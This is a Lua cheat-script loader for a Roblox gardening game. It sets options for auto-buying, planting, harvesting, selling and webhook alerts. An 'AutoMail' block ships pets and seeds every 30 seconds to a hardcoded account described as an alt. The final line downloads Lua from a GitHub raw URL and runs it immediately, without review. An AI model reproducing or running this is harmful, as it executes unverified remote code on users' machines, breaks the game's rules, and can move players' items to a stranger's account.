getgenv().Key = "" 
getgenv().BananaCat = {

    -- Master
    Enabled = true,

    -- Auto Toggles
    AutoBuySeeds = true,
    AutoBuyGears = false,
    AutoBuyPets = true,
    AutoEquipPets = true,
    AutoBuyPetSlots = false,
    AutoPlant = true,
    AutoShovelWeak = true,
    ShovelOnlyWhenFull = true,
    AutoUseGear = false,
    AutoUseSpecialTools = false,
    AutoHarvest = true,
    AutoSell = true,
    AutoOpenInventory = false,
    AutoCollectSeedPack = true,
    AutoFavorite = false,
    SingleSpotMode = false,

    -- Limits
    MinShecklesToSpend = 0,
    PetMinSheckles = 10000,
    SellThreshold = 5,
    PlotPlantCap = 200,
    FavoriteMinSize = 5,
    FavoriteMinWeight = 5,
    SprinklerTargetCount = 3,
    SkipRainbowSeeds = true,
    SkipGoldSeeds = true,

    -- FPS Boost
    FpsBoost = true,
    FpsHidePlayers = true,

    -- Webhook
    WebhookEnabled = true,
    WebhookURL = "",
    WebhookOnRarePet = true,
    WebhookOnRareSeed = true,
    WebhookOnRareMutation = true,
    WebhookPetMinPrice = 0,
    WebhookPetRarities = {
        Common = false,
        Legendary = true,
        Mythic = true,
        Rare = false,
        Super = true,
        Uncommon = false,
    },
    WebhookProfileReport = false,
    WebhookProfileIntervalMin = 30,

    -- Mail (gift to alt)
    AutoMail = true,
    MailRecipientUsername = "tongwapo100968",
    MailRecipientUserId = 7730496678,
    MailNote = "auto-shipped from main",
    MailPets = true,
    MailFruits = false,
    MailSeeds = true,
    MailMinPetPrice = 0,
    MailIntervalSec = 30,

    -- Whitelists
    SeedEnabled = {
        Acorn = true,
        Apple = false,
        ["Baby Cactus"] = true,
        Bamboo = true,
        Banana = true,
        Blueberry = false,
        Cactus = true,
        Carrot = false,
        Cherry = true,
        Coconut = true,
        Corn = true,
        ["Dragon Fruit"] = true,
        ["Dragon's Breath"] = true,
        ["Ghost Pepper"] = true,
        ["Glow Mushroom"] = true,
        Grape = true,
        ["Green Bean"] = true,
        ["Horned Melon"] = true,
        Mango = true,
        ["Moon Bloom"] = true,
        Mushroom = true,
        Pineapple = true,
        ["Poison Apple"] = true,
        ["Poison Ivy"] = true,
        Pomegranate = true,
        Romanesco = true,
        Strawberry = false,
        Sunflower = true,
        Tomato = false,
        Tulip = false,
        ["Venus Fly Trap"] = true,
    },
    GearEnabled = {},
    PetEnabled = {
        Bee = true,
        BlackDragon = true,
        Bunny = false,
        Deer = true,
        Frog = false,
        GoldenDragonfly = true,
        IceSerpent = true,
        Monkey = true,
        Owl = false,
        Raccoon = true,
        Robin = true,
        Unicorn = true,
    },
    FruitEnabled = {
        Acorn = true,
        Apple = true,
        ["Baby Cactus"] = true,
        Bamboo = true,
        Banana = true,
        Blueberry = true,
        Cactus = true,
        Carrot = true,
        Cherry = true,
        Coconut = true,
        Corn = true,
        ["Dragon Fruit"] = true,
        ["Dragon's Breath"] = true,
        ["Ghost Pepper"] = true,
        ["Glow Mushroom"] = true,
        Grape = true,
        ["Green Bean"] = true,
        ["Horned Melon"] = true,
        Mango = true,
        ["Moon Bloom"] = true,
        Mushroom = true,
        Pineapple = true,
        ["Poison Apple"] = true,
        ["Poison Ivy"] = true,
        Pomegranate = true,
        Romanesco = true,
        Strawberry = true,
        Sunflower = true,
        Tomato = true,
        Tulip = true,
        ["Venus Fly Trap"] = true,
    },
    FavoriteMutations = {
        Bloodlit = true,
        Chained = false,
        Electric = true,
        Frozen = true,
        Gold = false,
        Pizza = false,
        Rainbow = true,
        Solarflare = false,
        Starstruck = true,
    },
    SpecialToolsEnabled = {
        Carpet = true,
        Crowbar = true,
        PowerHose = true,
    },
}
loadstring(game:HttpGet("https://raw.githubusercontent.com/obiiyeuem/vthangsitink/refs/heads/main/kaitungag2.lua"))()
